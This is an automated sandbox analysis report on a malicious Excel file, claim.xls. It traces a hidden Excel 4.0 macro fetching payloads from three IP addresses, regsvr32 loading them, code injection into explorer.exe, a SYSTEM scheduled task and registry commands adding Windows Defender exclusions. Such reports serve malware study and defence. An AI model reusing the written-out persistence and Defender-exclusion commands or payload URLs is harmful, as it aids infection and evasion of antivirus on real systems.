Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10077464 push dword ptr fs:[00000030h] 12_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_1007792E mov eax, dword ptr fs:[00000030h] 15_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_1007785D mov eax, dword ptr fs:[00000030h] 15_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_10077464 push dword ptr fs:[00000030h] 15_2_10077464
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000D5A61 RtlAddVectoredExceptionHandler, 6_2_000D5A61
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00115A61 RtlAddVectoredExceptionHandler, 16_2_00115A61

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 4F102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 4F102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 4F102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 4F102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: C0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 4F102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: 4F102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: C0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: 4F102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: 4F102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: claim.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Orvzzr' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der' Jump to behavior
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000002.848099829.0000000000B20000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000D31C2 CreateNamedPipeA, 6_2_000D31C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 5_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 5_2_1000D01F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491045 Sample: claim.xls Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 71 Multi AV Scanner detection for dropped file 2->71 73 Document exploit detected (drops PE files) 2->73 75 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->75 77 6 other signatures 2->77 9 EXCEL.EXE 189 37 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 111.90.148.104, 49166, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->65 67 190.14.37.173, 49165, 80 OffshoreRacksSAPA Panama 9->67 69 51.89.115.111, 49167, 80 OVHFR France 9->69 55 C:\Users\user\...\44466.2404627315[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44466.2404627315[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44466.2404627315[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        101 Allocates memory in foreign processes 32->101 103 Maps a DLL or memory area into another process 32->103 42 explorer.exe 32->42         started        45 explorer.exe 34->45         started        53 C:\Users\user\Fiosa.der, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Fiosa1.der, PE32 42->61 dropped 63 C:\Users\user\Fiosa2.der, PE32 45->63 dropped signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
190.14.37.173
 unknown Panama
52469 OffshoreRacksSAPA false
51.89.115.111
 unknown France
16276 OVHFR false
111.90.148.104
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://111.90.148.104/44466.2404627315.dat false
  • Avira URL Cloud: safe
 unknown
http://190.14.37.173/44466.2404627315.dat false
  • Avira URL Cloud: safe
 unknown
http://51.89.115.111/44466.2404627315.dat false
  • Avira URL Cloud: safe
 unknown